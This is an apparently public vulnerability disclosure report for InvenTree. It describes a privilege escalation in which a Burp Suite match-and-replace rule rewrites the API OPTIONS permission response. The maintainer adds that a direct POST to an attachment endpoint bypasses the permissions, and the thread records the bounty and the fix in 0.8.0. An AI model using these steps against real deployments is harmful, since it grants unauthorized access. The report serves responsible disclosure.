Privilege Escalation via edit response body in inventree/inventree

Valid

Reported on

Jun 17th 2022


Description

Recently, i found a business logic vulnerabity and this vulnerability allow reader user perform privilege escalation on allaccess user. Because before user perform any function, client-side will perform OPTIONS request to view user permission with specify function via response body. If the attacker can manipulate response body, the attacker can modify this response body and access sensitive function.

Step to reproduce

1 - User reader can not perform Add Link function.

image

2 - In Burp suite, Proxy > Options > Match and replace , click Add.

Replace "actions":{"GET":true} with "actions":{"POST":{"pk":{"type":"integer","required":true,"read_only":true,"label":"ID"},"build":{"type":"related field","required":true,"read_only":false,"label":"Build","model":"build","api_url":"/api/build/","filters":{},"help_text":""},"attachment":{"type":"file upload","required":true,"read_only":false,"label":"Attachment","help_text":"Select file to attach"},"link":{"type":"url","required":false,"read_only":false,"label":"Link","help_text":"Link to external URL","max_length":200},"filename":{"type":"string","required":true,"read_only":false,"label":"Filename"},"comment":{"type":"string","required":false,"read_only":false,"label":"Comment","help_text":"File comment","max_length":100},"upload_date":{"type":"date","required":true,"read_only":true,"label":"Upload date","help_text":""},"user":{"type":"related field","required":false,"read_only":false,"label":"User","help_text":"User","model":"user","api_url":"/api/user/","filters":{}},"user_detail":{"type":"nested object","required":true,"read_only":true,"label":"User detail","children":{"pk":{"type":"integer","required":true,"read_only":true,"label":"ID"},"username":{"type":"string","required":true,"read_only":false,"label":"Username","help_text":"Required. 150 characters or fewer. Letters, digits and @/./+/-/_ only.","max_length":150},"first_name":{"type":"string","required":false,"read_only":false,"label":"First name","max_length":150,"help_text":""},"last_name":{"type":"string","required":false,"read_only":false,"label":"Last name","max_length":150,"help_text":""},"email":{"type":"email","required":false,"read_only":false,"label":"Email address","max_length":254,"help_text":""}}}},"DELETE":true,"GET":true}

image And click OK.

3 - Try Add link funcion again with reader account, and success!

image

Impact

This vulnerability allow attacker with low privilege can perform high privilege to access sensitive function.

We are processing your report and will contact the inventree team within 24 hours. 2 years ago
A GitHub Issue asking the maintainers to create a SECURITY.md exists 2 years ago
Nhien.IT modified the report
2 years ago
Oliver modified the Severity from Critical (9.4) to Medium (6.5) 2 years ago
Oliver
2 years ago

Maintainer


Thanks for reporting this. I have found that there is an even easier way to reproduce this:

Simply navigate to the appropriate API URL e.g. /api/part/attachment/ and an authenticated user who nominally cannot create or edit attachments can issue a POST request against this endpoint. No manipulation of front-end code is required.

We will have a fix out for this ASAP, thanks again for reporting.

The researcher has received a minor penalty to their credibility for miscalculating the severity: -1
Oliver validated this vulnerability 2 years ago
nhienit2010 has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
Oliver marked this as fixed in 0.8.0 with commit 12fccc 2 years ago
Oliver has been awarded the fix bounty
Nhien.IT
2 years ago

Researcher


Hi @mainter,

any bounty for this vulnerability?

Nhien.IT
2 years ago

Researcher


Hi @maintainer, the fix is already released, can you assign a CVE here? if you can, hope @admin help

Jamie Slome
2 years ago

We can assign and publish a CVE with the permission of the @maintainer 👍

to join this conversation